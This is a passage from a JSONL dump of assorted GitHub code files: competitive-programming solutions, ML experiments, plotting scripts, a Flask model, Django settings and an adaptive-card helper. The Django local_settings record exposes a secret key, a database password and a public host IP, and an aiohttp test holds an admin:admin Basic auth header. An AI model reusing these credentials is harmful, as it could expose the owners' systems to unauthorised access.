order[i]:\n\t\tp[i] = -1\n\t\tif p[i+1] == order[i+1]:\n\t\t\tp[i+1] = -1\n\t\t\tans += 1\n\t\t\ti += 1\n\t\telse:\n\t\t\tans += 1\n\n\ti += 1\n\nif p[N-1] == order[N-1]:\n\tans += 1\n\nprint(ans)\n\n","repo_name":"banboooo044/AtCoder","sub_path":"ABC072/D.py","file_name":"D.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12797270127","text":"from sklearn import datasets\nboston = datasets.load_boston()\nx = boston.data\ny = boston.target\nhalf = int(len(x)/2)\n\nimport regression\nmodel = regression.RidgeRegression(alpha=0.1)\n\n# case 1: learn on the first half, test on the last half\nmodel.fit(x[:half], y[:half])\nscore = model.score(x[half:], y[half:])\n\n# case 2: learn on the last half, test on the first half\nmodel.fit(x[half:], y[half:])\nscore += model.score(x[:half], y[:half])\n\nprint(\"RidgeRegression(alpha=0.1) score =\", score)\n#-> RidgeRegression(alpha=0.1) score = 78656.6246552\n#-> RidgeRegression(alpha=1.0) score = 42334.1689238\n","repo_name":"naltoma/regression-test","sub_path":"crossvalidation.py","file_name":"crossvalidation.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"85282349","text":"__author__ = 'vchang'\n\nfrom celery import Celery\n\nfrom app.routes.controllers import manual_route_poll\n\ncelery = Celery('tasks')\ncelery.config_from_object('app.routes.celeryconfig')\n\n@celery.task\ndef trigger_grab(route_id):\n save_duration(route_id)","repo_name":"nekorevend/routetimetrend","sub_path":"project/RouteTimeTrend/app/routes/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":251,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"40838169","text":"#Practical Lab Assignment 7.1.2\r\n# Create an array of 1 to 20 in reverse order using arange function.\r\n\r\n#importing numpy library\r\n\r\nimport numpy as np \r\n\r\nn = int(input(\"Enter the size of Array: \"))\r\na = []\r\n\r\nfor i in range(0,n):\r\n a.append(i)\r\n\r\narr = np.array(a)\r\n\r\n#in arange function (n-1) defines starting value, -1 is stopping value which is not included and last one is for difference in elements\r\nprint(arr[np.arange(n-1,-1,-1)])","repo_name":"darshanjoshi16/GTU-Python-PDS","sub_path":"lab7_1_2.py","file_name":"lab7_1_2.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"6696551882","text":"# Load the Python Standard and DesignScript Libraries\nimport sys\nimport clr\nclr.AddReference('ProtoGeometry')\nfrom Autodesk.DesignScript.Geometry import *\nimport System\nfrom System import Array\nfrom System.Collections.Generic import *\n\n# The inputs to this node will be stored as a list in the IN variables.\nFirstList = IN[0]\nSecondList = IN[1]\n\n# Flatten list function\ndef flatten_list(nested_list):\n flat_list = []\n for element in nested_list:\n if isinstance(element, list):\n flat_list.extend(flatten_list(element))\n else:\n flat_list.append(element)\n return flat_list\n\n# Combine the two lists\ncombined_list = FirstList + SecondList\n\n# Use the function with the combined list\nflat_list = flatten_list(combined_list)\n\n# Count the elements in the final list\nelement_count = len(flat_list)\n\n# Assign your output to the OUT variable.\nOUT = element_count\n","repo_name":"PkHeris/Dynamo_python","sub_path":"python scripts/Combine_Flatten_Count_Lists.py","file_name":"Combine_Flatten_Count_Lists.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39183507031","text":"import sys\nimport os\nimport socket\nHOME=os.environ['HOME']\nsys.path.insert(1,HOME+'/github/StreamingSVM')\nfrom operations import LoadLibsvm\nimport numpy as np\nfrom operations import Print\nimport time\n\ndef stats(exp_name='', acc=0, time=0):\n Print.Print.result1(exp_name + \" Streaming Accuracy : \" + str(acc) + \"%\" + \", \" + str(time))\n\n fp = open(\"logs/\" + socket.gethostname() + \"_\" + exp_name + \"_meb_results.txt\", \"a\")\n # fp.write(\"alpha : \" + str(self.alpha) + \", epochs : \" + str(self.epochs) + \", accuracy : \" + str(self.acc) + \"%\" + \", time : \" + str(self.training_time) + \" s\\n\")\n fp.write(str(acc) + \", \" + str(time) + \"\\n\")\n fp.close()\n\nX = np.array([[1,1],[2,1],[3,1],[4,1],[1,5],[2,6],[3,7],[4,5]])\ny = np.array([1,1,1,1,-1,-1,-1,-1])\nX_test = np.array([[1,1.25],[2.1,1.15],[3.1,1.45],[4.23,1.21],[1.3,5.25],[2.11,6.24],[3.3,7.24],[4.212,5.78]])\n#plt.scatter(X[:,0],X[:,1])\n#plt.show()\ndatasets = [ 'ijcnn1', 'heart', 'webspam', 'cod-rna', 'phishing', 'breast_cancer', 'w8a', 'a9a', 'real-slim']\nn_features = [22, 13, 254, 8, 68, 10, 300 , 123, 20958]\nsplits = [False, False, True, False, True, True, False, False, True]\n\nfor dataset, features, split in zip(datasets, n_features, splits):\n\n base_path = ''\n hostname = socket.gethostname()\n\n if hostname == 'vibhatha-ThinkPad-P50':\n base_path = '/home/vibhatha/data/svm/'\n else:\n base_path = '/N/u/vlabeyko/data/svm/svm/'\n\n bulk = False\n dataset = dataset\n training_file = base_path + dataset + '/training.csv'\n testing_file = base_path + dataset + '/testing.csv'\n n_features = features\n split = split\n training_loader = LoadLibsvm.LoadLibSVM(filename=training_file, n_features=n_features)\n\n x_training = []\n y_training = []\n x_testing = []\n y_testing = []\n\n if split == True:\n x_all, y_all = training_loader.load_all_data()\n ratio = 0.8\n size = len(x_all)\n split_index = int(size * ratio)\n x_training = x_all[:split_index]\n x_testing = x_all[split_index:]\n y_training = y_all[:split_index]\n y_testing = y_all[split_index:]\n\n else :\n training_loader = LoadLibsvm.LoadLibSVM(filename=training_file, n_features=n_features)\n testing_loader = LoadLibsvm.LoadLibSVM(filename=testing_file, n_features=n_features)\n x_training, y_training = training_loader.load_all_data()\n x_testing, y_testing = testing_loader.load_all_data()\n\n print(x_training.shape)\n X = x_training\n y = y_training\n\n\n M = 1\n R = 0\n e2 = 1\n w = y[0] * X[0]\n C = 1\n exp_time = 0\n exp_time -= time.time()\n for i in range(1,len(X)):\n d = np.sqrt(np.linalg.norm(w-y[i]*X[i]) + e2 + 1/C)\n if d >= R:\n w = w + 0.5 * (1 - R/d) * (y[i] * X[i] - w)\n R = R + 0.5 * (d-R)\n e2 = e2 * (1- (0.5) * (1- (R/d)))**2 + (0.5 * (1 - (R/d)))**2\n M = M + 1\n exp_time += time.time()\n print(\"R : \", R)\n print(\"W : \", w)\n print(\"M : \", M)\n\n #plt.scatter(X[:,0],X[:,1])\n #plt.show()\n\n labels = []\n for x in x_testing:\n label = np.sign(np.dot(w.T, x))\n labels.append(label)\n\n y_pred = np.array(labels)\n #print(labels)\n #print(y_testing)\n correct = (y_pred == y_testing).sum()\n total = len(y_pred)\n acc = float(correct) / float(total) * 100.0\n print(\"Acc : \", acc)\n print(\"Time : \", exp_time)\n stats(exp_name=dataset, acc=acc, time=exp_time)\n\n\n","repo_name":"vibhatha/PSGDSVMPY","sub_path":"meb/MEBLib.py","file_name":"MEBLib.py","file_ext":"py","file_size_in_byte":3458,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"33595489330","text":"import aiohttp\nimport asyncio\nimport time\n\nimport requests\n\n\n\nheaders = {\n'Accept': \"application/json\",\n'Content-Type': \"application/json\",\n'Authorization': \"Basic YWRtaW46YWRtaW4=\",\n'cache-control': \"no-cache\"\n}\n\nasync def main():\n async with aiohttp.ClientSession() as session:\n for _ in range(10):\n async with session.get('http://python.org') as response:\n\n print(\"Status:\", response.status)\n print(\"Content-type:\", response.headers['content-type'])\n\n html = await response.text()\n print(\"Body:\", html[:100], \"...\")\n\nstart_time = time.time()\n\nloop = asyncio.get_event_loop()\nloop.run_until_complete(main())\n\nprint(time.time() - start_time)\n\n\n\n\n\n# async with aiohttp.ClientSession(headers=headers) as session:\n# async with session.get(\"http://httpbin.org/headers\") as response:\n# json_body = await response.json()","repo_name":"int-unl/End-to-End-Slicing","sub_path":"transport/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"253054958","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nSolution for day 14 2020\n\"\"\"\n\n__author__ = 'Guido Minieri'\n__license__ = 'GPL'\n\n\nwith open('input.txt', 'r') as f:\n data = f.read().splitlines()\n\nfrom collections import defaultdict as dd\nfrom itertools import product\n\ndef build_instr(data):\n instr = dd(list)\n for el in data:\n if el[:4] == \"mask\": mask = el.split(\" = \")[1]\n elif el[:3] == \"mem\":\n mem = el.split(\"] = \")[0].split(\"[\")[1]\n val = el.split(\" = \")[1]\n instr[mask] += [(int(mem), int(val))]\n return instr\n\ndef build_memory_v1(instr):\n memory = dd(int)\n for k, v in instr.items():\n mask = k\n for calc in v:\n mem, val = calc\n memory[mem] = compute_mask(val, mask)\n return memory\n\ndef compute_mask(val, mask):\n res = \"\"\n mask = \"0b\" + mask\n bin_val = format(val, f'#0{len(mask)}b')\n for i, _ in enumerate(mask):\n if mask[i] == \"X\":\n res += bin_val[i]\n continue\n else:\n res += mask[i]\n continue\n return int(res, 2)\n\ndef build_memory_v2(instr):\n memory = dd(int)\n for k, v in instr.items():\n mask = k\n for calc in v:\n mem, val = calc\n mem = mask_mem(mem, mask)\n for addr in mem:\n memory[addr] = val\n return memory\n\ndef mask_mem(mem, mask):\n addrs = []\n res = \"\"\n mask = \"0b\" + mask\n bin_val = format(mem, f'#0{len(mask)}b')\n for i, _ in enumerate(mask):\n if mask[i] == \"X\":\n res += \"f\"\n continue\n elif mask[i] in ['0', 'b']:\n res += bin_val[i]\n continue\n else:\n res += \"1\"\n continue\n return [x for x in scramble(res)]\n\ndef scramble(binary):\n res = []\n float_idx = [i for i, val in enumerate(binary) if val == \"f\"]\n prod_rules = {k:[0,1] for k in float_idx}\n products = [dict(zip(prod_rules, v)) for v in product(*prod_rules.values())]\n for rule in products:\n target = list(binary)\n for k, v in rule.items():\n target[k] = str(v)\n res.append(\"\".join(target))\n return [int(x, 2) for x in res]\n\nset_instr = build_instr(data)\n# pt1\nmem1 = build_memory_v1(set_instr)\nprint(sum([x for x in mem1.values()]))\n# pt2\nmem2 = build_memory_v2(set_instr)\nprint(sum([x for x in mem2.values()]))\n","repo_name":"gmnr/advent-of-code","sub_path":"2020/14/day14.py","file_name":"day14.py","file_ext":"py","file_size_in_byte":2392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9176863651","text":"# This file is exec'd from settings.py, so it has access to and can\n# modify all the variables in settings.py.\nimport os\nDEBUG = True\n\n# Make these unique, and don't share it with anybody.\nSECRET_KEY = \"pl(@#n^(g3kb*&4s_ah)^+e(b4q(%6!)1!+49urwedjz1z#dzb\"\nNEVERCACHE_KEY = \"gfl-q+ak#3onuipxt=3am@0e@iz@3^!ks(+rb1sa_n(49$0s=)\"\n\nDATABASES = {\n \"default\": {\n # Ends with \"postgresql_psycopg2\", \"mysql\", \"sqlite3\" or \"oracle\".\n \"ENGINE\": \"django.db.backends.postgresql_psycopg2\",\n # DB name or path to database file if using sqlite3.\n \"NAME\": \"aavin\",\n # Not used with sqlite3.\n \"USER\": \"aavin\",\n # Not used with sqlite3.\n \"PASSWORD\": \"kultivate\",\n # \"PASSWORD\":\"aavinlocall\",\n # \"PASSWORD\":\"aavinlocall\",\n # Set to empty string for localhost. Not used with sqlite3.\n # \"HOST\": \"localhost\",\n # \"HOST\": \"139.59.80.236\",\n \"HOST\":\"65.1.212.193\",\n # Set to empty string for default. Not used with sqlite3.\n \"PORT\": \"5432\",\n # \"PORT\": \"165.22.220.62\",\n }\n}\n\n# Allowed development hosts\nALLOWED_HOSTS = [\"localhost\", \"127.0.0.1\", \"::1\", \"*\"]\n\n\n#static & Media \nSTATIC_URL = '/static/'\nMEDIA_URL = STATIC_URL + '/media/' \nDATA_DIR = '/opt/aavin-assets/'\nSTATIC_ROOT = os.path.join(DATA_DIR, STATIC_URL.strip(\"/\"))\nMEDIA_ROOT = os.path.join(DATA_DIR, MEDIA_URL.strip(\"/\"))\n\n###################\n# DEPLOY SETTINGS #\n###################\n\n# These settings are used by the default fabfile.py provided.\n# Check fabfile.py for defaults.\n\n# FABRIC = {\n# \"DEPLOY_TOOL\": \"rsync\", # Deploy with \"git\", \"hg\", or \"rsync\"\n# \"SSH_USER\": \"\", # VPS SSH username\n# \"HOSTS\": [\"\"], # The IP address of your VPS\n# \"DOMAINS\": [\"\"], # Will be used as ALLOWED_HOSTS in production\n# \"REQUIREMENTS_PATH\": \"requirements.txt\", # Project's pip requirements\n# \"LOCALE\": \"en_US.UTF-8\", # Should end with \".UTF-8\"\n# \"DB_PASS\": \"\", # Live database password\n# \"ADMIN_PASS\": \"\", # Live admin user password\n# \"SECRET_KEY\": SECRET_KEY,\n# \"NEVERCACHE_KEY\": NEVERCACHE_KEY,\n# }","repo_name":"ALTHAFACTIVEGIT/aawin","sub_path":"aavin_admin/local_settings.py","file_name":"local_settings.py","file_ext":"py","file_size_in_byte":2098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8823316994","text":"import matplotlib\nimport matplotlib.pyplot as plt\n#plt.style.use('bmh')\nx_ass_koord=[2015,2016,2017,2018,2019]\ny_ass_koord=[2.50,3.15,3.50,4.05,5.70]\ny_ass_koord2=[7.50,8.00,8.50,8.70,9.00]\nplt.xlabel(\"Gadi\")\nplt.ylabel(\"Cenas Eiro\")\nplt.axis([2014,2020,0,10])\nplt.title(\"Cenu izmaiņas pa gadiem\")\nplt.bar(x_ass_koord,y_ass_koord,label=\"Siera cena\",linewidth=3,linestyle=\"dotted\", color='red')\nplt.plot(x_ass_koord,y_ass_koord2,label=\"Desas cena\")\nplt.legend(loc=\"lower right\")\nplt.show()","repo_name":"skolotaja/Grafiks1","sub_path":"grafiks.py","file_name":"grafiks.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1716094896","text":"from ..config.mysqlconnection import connectToMySQL\nfrom flask import flash\nfrom ..models import user\n\n\n\n\nclass Pypie:\n def __init__(self, data):\n self.id = data['id']\n self.name = data['name']\n self.filling = data['filling']\n self.crust = data['crust']\n self.votes = data['votes']\n self.created_at = data['created_at']\n self.updated_at = data['updated_at']\n self.user_id = data['user_id']\n\n @property\n def get_user(self):\n info = {\n \"id\": self.user_id\n }\n return user.User.get_by_id(info)\n\n @classmethod\n def get_all(cls):\n query = \"SELECT * FROM pypies\"\n results = connectToMySQL(\"pie_schema\").query_db(query)\n all_pypies = []\n for pypie_row in results:\n pypie_obj = cls(pypie_row)\n all_pypies.append(pypie_obj)\n return all_pypies\n\n @classmethod\n def get_all_users_pypies(cls, data):\n query = \"SELECT * FROM pypies WHERE user_id = %(id)s\"\n results = connectToMySQL(\"pie_schema\").query_db(query, data)\n\n return results\n\n# @classmethod\n# def increase_votes():\n# query = \"UPDATE pypies SET votes = votes + 1 WHERE id = %(id)s;\"\n# results = connectToMySQL(\"pie_schema\").query_db(query)\n# return results\n\n\n @classmethod\n def get_by_id_2(cls, data):\n query = \"SELECT * FROM users LEFT JOIN pypies ON users.id = pypies.user_id WHERE users.id = %(id)s;\"\n\n results = connectToMySQL(\"pie_schema\").query_db(query, data)\n\n user = cls(results[0])\n \n if results[0]['pypies.id'] != None:\n for row in results:\n row_data = {\n \"id\": row['pypies.id'],\n \"name\": row['name'],\n \"filling\": row['filling'],\n \"crust\": row['crust'],\n \"votes\": row['votes'],\n \"created_at\": row['pypies.created_at'],\n \"updated_at\": row['pypies.updated_at'],\n \"user\": user\n }\n\n user.pypies.append(Pypie(row_data))\n\n return user\n\n @classmethod\n def get_one(cls, data):\n query = \"SELECT * FROM pypies WHERE id = %(id)s\"\n results = (connectToMySQL(\"pie_schema\").query_db(query, data))\n row_data = {\n \"id\": results[0]['id'],\n \"name\": results[0]['name'],\n \"filling\": results[0]['filling'],\n \"crust\": results[0]['crust'],\n \"votes\": results[0]['votes'],\n \"created_at\": results[0]['created_at'],\n \"updated_at\": results[0]['updated_at'],\n \"user_id\": results[0]['user_id']\n }\n return cls(row_data)\n\n\n\n @classmethod\n def create(cls, data):\n query = \"INSERT INTO pypies (user_id, name, filling, crust, created_at, updated_at) VALUES (%(user_id)s, %(name)s, %(filling)s, %(crust)s, NOW(), NOW())\"\n return connectToMySQL(\"pie_schema\").query_db(query,data)\n\n\n @classmethod\n def update(cls, data):\n query = \"UPDATE pypies SET name = %(name)s, filling = %(filling)s, crust = %(crust)s, updated_at = NOW() WHERE id = %(id)s\"\n return connectToMySQL(\"pie_schema\").query_db(query, data)\n\n @classmethod\n def delete(cls, data):\n query = \"DELETE FROM pypies WHERE id = %(id)s\"\n return connectToMySQL(\"pie_schema\").query_db(query, data)\n\n @staticmethod\n def validate(post_data):\n is_valid = True\n\n if len(post_data['name']) < 1:\n flash(\"Name is required.\")\n is_valid = False\n \n if len(post_data['filling']) < 1:\n flash(\"Filling is required.\")\n is_valid = False\n \n if len(post_data['crust']) < 1:\n flash(\"Crust is required.\")\n is_valid = False\n\n return is_valid\n\n","repo_name":"TessaP97/Python","sub_path":"pie_exam_crud/flask_app/models/pie.py","file_name":"pie.py","file_ext":"py","file_size_in_byte":3858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28147878870","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom pandas import read_csv\r\nfrom scipy.stats import linregress\r\nimport re\r\n\r\nLC1 = read_csv('LC1.csv')\r\nLC2 = read_csv('LC2.csv')\r\nLC3 = read_csv('LC3.csv')\r\nLC4 = read_csv('LC4.csv')\r\nLC4_extra = read_csv('LC4_Higher_Weights.csv')\r\n\r\n\r\n\r\ndef values(df, column):\r\n \r\n # data from single column\r\n col_data = df[column] \r\n \r\n # replace FALSE s with NaN s then delete NaNs\r\n z = col_data.replace(to_replace=('FALSE','False'), value=np.nan).dropna().map(float)\r\n \r\n # calculate 'gradient' change\r\n z_der = np.asarray([z.iloc[i+1]-z.iloc[i] for i in range(len(z)-1)])\r\n \r\n # find outliers where gradient change is too high (spike)\r\n outliers = np.where(abs(z_der) > 1000) \r\n \r\n # new data from single columm without FALSES and spikes\r\n z_new = np.delete(np.asarray(z), outliers)\r\n \r\n # remove last \r\n z_new = np.delete(z_new, -1)\r\n \r\n print(len(col_data)-len(z_new))\r\n \r\n # calculate graph data\r\n mean = np.average(z_new)\r\n std = np.std(z_new)\r\n \r\n return column, z, z_new, mean, std\r\n\r\nsize = 13\r\np=LC2.iloc[:,16].replace(to_replace=('FALSE','False'), value=np.nan).map(float)\r\nplt.xlabel('Time (s)', size=size)\r\nplt.ylabel('Raw voltage output (mV)', size=size)\r\nplt.xticks(fontsize= size)\r\nplt.yticks(fontsize= size)\r\nplt.plot(np.array(list(range(0,len(p))))/80,p, linewidth=2, color='r') # 29 errors\r\n\r\n\"\"\"\r\n# plots each column in df after filtering to check\r\n# it removed spikes\r\nfor column in LC2:\r\n __, z, z_new, mean, std = values(LC2, column)\r\n \r\n fig, ax = plt.subplots()\r\n ax.plot(z_new)\r\n ax.set_title(column)\r\n break\r\n\r\n\"\"\"\r\n\r\n# import scipy.fftpack\r\n# spdata = LC1.iloc[:,2].replace(to_replace='False', value=np.nan).dropna().map(float).to_numpy()\r\n\r\n# N = len(spdata)\r\n\r\n# T = 1.0/87.0\r\n\r\n# x = np.linspace(0.0, N*T, N)\r\n\r\n# y = spdata\r\n\r\n# yf = scipy.fftpack.fft(y)\r\n# xf = np.linspace(0.0, 1.0//(2.0*T), N//2)\r\n \r\n# # fig, ax = plt.subplots()\r\n# # ax.semilogy(xf, (2.0/N * np.abs(yf[:N//2])))\r\n# plt.semilogy(xf, (2.0/N * np.abs(yf[:N//2])))\r\n# plt.show()\r\n \r\n# # spdata = LC1.iloc[:,2].replace(to_replace='False', value=np.nan).dropna().map(float).to_numpy()\r\n# # sp = np.fft.fft(np.sort(spdata))\r\n# # t = np.arange(len(sp))*0.011494\r\n# # freq = np.fft.fftfreq(t.shape[-1])\r\n# # plt.plot(freq, sp.real, freq, sp.imag)\r\n# # plt.show()\r\n \r\ndef plotting_data(LC):\r\n \r\n mass = []\r\n output = []\r\n std_dev= []\r\n \r\n for i in range(len(LC.columns)-1):\r\n \r\n column, z, z_new, mean, std = values(LC, LC.columns[i+1])\r\n \r\n column = re.findall(r\"\\d*\\.\\d*\", column)\r\n \r\n if len(column) != 0:\r\n mass.append(float(column[0]))\r\n \r\n output.append(mean)\r\n std_dev.append(std)\r\n \r\n \r\n return np.asarray(mass), np.asarray(output), np.asarray(std_dev)\r\n\r\n#x, y, std_dev = plotting_data(LC2)\r\n\r\n\r\n#fig, axs = plt.subplots(3)\r\n#fig.suptitle('LC2')\r\n#axs[0].errorbar(mass, mean_output, yerr=std_dev, fmt='o',\r\n# ecolor='orangered', color='steelblue', capsize=2)\r\n#axs[1].plot(z)\r\n#axs[2].plot(z_new)\r\n\r\n\r\n#print(linregress(list(map(float,x)), list(map(float, y))))\r\n#print(linregress(list(map(float,x[5:])), list(map(float, y[5:]))))\r\n#fig, axs = plt.subplots(2)\r\n#fig.suptitle('LC2')\r\n#axs[0].errorbar(x, y, yerr=std_dev, fmt='o',\r\n# ecolor='orangered', color='steelblue', capsize=2)\r\n#axs[0].plot(114.14291370261368*np.linspace(0,5889.38,33) + 112752.45433255972, '-k')\r\n#axs[1].errorbar(x[5:], y[5:], yerr=std_dev[5:], fmt='o',\r\n# ecolor='orangered', color='steelblue', capsize=2)\r\n#axs[1].plot(114.14470649223804*np.linspace(471.56,5890,28) + 112745.17170897644, '-k')\r\n\r\n#----------------------------------------------------------------\r\n# x- are masses\r\n# y- are the load cell outputs\r\n\r\n\r\n\"\"\"LC1\"\"\"\r\nx1, y1, std_dev1 = plotting_data(LC1)\r\nx1 = x1/1E3\r\nslope1, intercept1, r_value1, p_value1, std_error1 = linregress(list(map(float,\r\n x1)), list(map(float, y1)))\r\n\"\"\"LC2\"\"\"\r\nx2, y2, std_dev2 = plotting_data(LC2)\r\nx2 = x2/1E3\r\nslope2, intercept2, r_value2, p_value2, std_error2 = linregress(list(map(float,\r\n x2)), list(map(float,y2)))\r\n\"\"\"LC3\"\"\" \r\nx3, y3, std_dev3 = plotting_data(LC3)\r\nx3 = x3/1E3\r\nslope3, intercept3, r_value3, p_value3, std_error3 = linregress(list(map(float,\r\n x3)), list(map(float, y3)))\r\n\r\n\"\"\"LC4\"\"\"\r\nx4, y4, std_dev4 = plotting_data(LC4)\r\nx4 = x4/1E3\r\nslope4, intercept4, r_value4, p_value4, std_error4 = linregress(list(map(float,\r\n x4)), list(map(float, y4)))\r\n\r\n# uncomment for all plots on 1 graph\r\n\r\n# LC1 plot\r\n# plt.errorbar(x1, y1, yerr=std_dev1, fmt='o',\r\n# capsize=2, color='gold')\r\n# plt.plot(x1, intercept1 + slope1*x1, '-',\r\n# color='gold', label='LC1: y={:.4}x + {:.4}'.format(slope1,intercept1))\r\n# plt.xlabel('Mass (kg)')\r\n# plt.ylabel('Output (mV)')\r\n# # LC2 plot\r\n# plt.errorbar(x2, y2, yerr=std_dev2, fmt='o',\r\n# capsize=2, color='cornflowerblue')\r\n# plt.plot(x2, intercept2 + slope2*x2,\r\n# color='cornflowerblue', linestyle='-' ,\r\n# label='LC2: y={:.4}x + {:.4}'.format(slope2,intercept2))\r\n# # LC3 plot\r\n# plt.errorbar(x3, y3, yerr=std_dev3, fmt='o',\r\n# capsize=2, color='yellowgreen')\r\n# plt.plot(x3, intercept3 + slope3*x3,'-', \r\n# color='yellowgreen',label='LC3: y={:.4}x + {:.4}'.format(slope3,intercept3))\r\n# #\r\n# # LC4 plot\r\n# plt.errorbar(x4, y4, yerr=std_dev4, fmt='o',\r\n# capsize=2, color='tomato')\r\n# plt.plot(x4, intercept4 + slope4*x4, '-',\r\n# color='tomato',label='LC4: y={:.4}x + {:.4}'.format(slope4,intercept4))\r\n\r\n# plt.legend(loc = 'upper left')\r\n# plt.show() \r\n\r\nsize=12\r\nplt.errorbar(x1, y1, yerr=std_dev1, fmt='o',\r\n capsize=2, color='gold')\r\nplt.plot(x1, intercept1 + slope1*x1, '-',\r\n color='gold', label='Load cell 1')\r\nplt.xlabel('Force (N)', size=size)\r\nplt.ylabel('Load cell output (mV)', size=size)\r\n# LC2 plot\r\nplt.errorbar(x2, y2, yerr=std_dev2, fmt='o',\r\n capsize=2, color='cornflowerblue')\r\nplt.plot(x2, intercept2 + slope2*x2,\r\n color='cornflowerblue', linestyle='-' ,\r\n label='Load cell 2')\r\n# LC3 plot\r\nplt.errorbar(x3, y3, yerr=std_dev3, fmt='o',\r\n capsize=2, color='yellowgreen')\r\nplt.plot(x3, intercept3 + slope3*x3,'-', \r\n color='yellowgreen',label='Load cell 3')\r\n#\r\n# LC4 plot\r\nplt.errorbar(x4, y4, yerr=std_dev4, fmt='o',\r\n capsize=2, color='tomato')\r\nplt.plot(x4, intercept4 + slope4*x4, '-',\r\n color='tomato',label='Load cell 4')\r\nplt.xticks(fontsize= size)\r\nplt.yticks(fontsize= size)\r\nplt.legend(loc = 'upper left', prop={'size': 10})\r\nplt.show() \r\n\r\n\r\n\"\"\"\r\nfig, axs = plt.subplots(2,2, figsize=(20, 10))\r\naxs[0,0].errorbar(x1, y1, yerr=std_dev1, fmt='o',\r\n capsize=2, color='gold')\r\naxs[0,0].plot(x1, intercept1 + slope1*x1, '--',\r\n color='gold', label='y={:.4}x + {:.4} = '.format(slope1,intercept1))\r\n#axs[0,0].legend(loc=\"upper left\")\r\naxs[0,0].set(ylabel='Ouput (UNITS)')\r\naxs[0,0].text(0.0, 6.5E5, 'y={:.4}x + {:.4}\\nR$^2$={:.7}\\nSE={:.4}'.format(slope1,intercept1,r_value1**2,std_error1), color='black', \r\n bbox=dict(facecolor='none', edgecolor='black', boxstyle='round,pad=1'))\r\naxs[0, 0].set_title('LC1')\r\n\r\naxs[0,1].errorbar(x2, y2, yerr=std_dev2, fmt='o',\r\n capsize=2, color='cornflowerblue')\r\naxs[0,1].plot(x2, intercept2 + slope2*x2,\r\n color='cornflowerblue', linestyle='dashed' ,\r\n label='LC2: y={:.4}x + {:.4}'.format(slope2,intercept2))\r\n#axs[0,1].legend(loc=\"upper left\")\r\naxs[0,1].text(0.0, 6.5E5, 'y={:.4}x + {:.4}\\nR$^2$={:.8}\\nSE={:.4}'.format(slope2,intercept2,r_value2**2,std_error2), color='black', \r\n bbox=dict(facecolor='none', edgecolor='black', boxstyle='round,pad=1'))\r\naxs[0,1].set_title('LC2')\r\n\r\naxs[1,0].errorbar(x3, y3, yerr=std_dev3, fmt='o',\r\n capsize=2, color='yellowgreen')\r\naxs[1,0].plot(x3, intercept3 + slope3*x3,'--', \r\n color='yellowgreen',label='LC3: y={:.4}x + {:.4}'.format(slope3,intercept3))\r\n#axs[1,0].legend(loc=\"upper left\")\r\naxs[1,0].set(xlabel='Mass (kg)', ylabel='Ouput (UNITS)')\r\naxs[1,0].text(0.0, 4.5E5, 'y={:.4}x {:.4}\\nR$^2$={:.7}\\nSE={:.4}'.format(slope1,intercept3,r_value3**2,std_error3), color='black', \r\n bbox=dict(facecolor='none', edgecolor='black', boxstyle='round,pad=1'))\r\naxs[1,0].set_title('LC3')\r\n\r\naxs[1,1].errorbar(x4, y4, yerr=std_dev4, fmt='o',\r\n capsize=2, color='tomato')\r\naxs[1,1].plot(x4, intercept4 + slope4*x4, '--',\r\n color='tomato',label='LC4: y={:.4}x + {:.4}'.format(slope4,intercept4))\r\n#axs[1,1].legend(loc=\"upper left\")\r\naxs[1,1].set(xlabel='Mass (kg)')\r\naxs[1,1].text(0.0, 5.75E5, 'y={:.4}x + {:.4}\\nR$^2$={:.7}\\nSE={:.4}'.format(slope4,intercept4,r_value4**2,std_error4), color='black', \r\n bbox=dict(facecolor='none', edgecolor='black', boxstyle='round,pad=1'))\r\naxs[1,1].set_title('LC4')\r\n\r\nplt.savefig('Loading_Curves.png', bbox_inches='tight')\r\n\r\n# print('std_error1 =', std_error1)\r\n# print('std_error2 =', std_error2)\r\n# print('std_error3 =', std_error3)\r\n# print('std_error4 =', std_error4)\r\n\"\"\"","repo_name":"mtirbhowan/MSci-Project","sub_path":"Data/LC_calibration/loading_curves.py","file_name":"loading_curves.py","file_ext":"py","file_size_in_byte":9401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32605991727","text":"from pyadaptivecards.card import AdaptiveCard\nfrom pyadaptivecards.components import TextBlock\nfrom pyadaptivecards.inputs import Text, Number\nfrom pyadaptivecards.actions import Submit\n\ndef make_card_payload(card):\n \"\"\"Create a attachment payload from a adaptive card instance. \n\n Args:\n card (AdaptiveCard): Instance of the adaptive card for this attachment. \n\n Raises:\n Exception: If card is not a subclass of AdaptiveCard or an instance of\n AdaptiveCard.\n\n Returns:\n dict: A attachment payload containing the specified card. \n \"\"\"\n if not issubclass(type(card), AdaptiveCard) and not isinstance(card, AdaptiveCard):\n raise Exception('card must be either a subclass of AdaptiveCard or an instance of AdaptiveCard')\n \n attachment = {\n \"contentType\": \"application/vnd.microsoft.card.adaptive\",\n \"content\": card.to_dict(),\n }\n\n return attachment\n\nclass ResponseCard(AdaptiveCard):\n 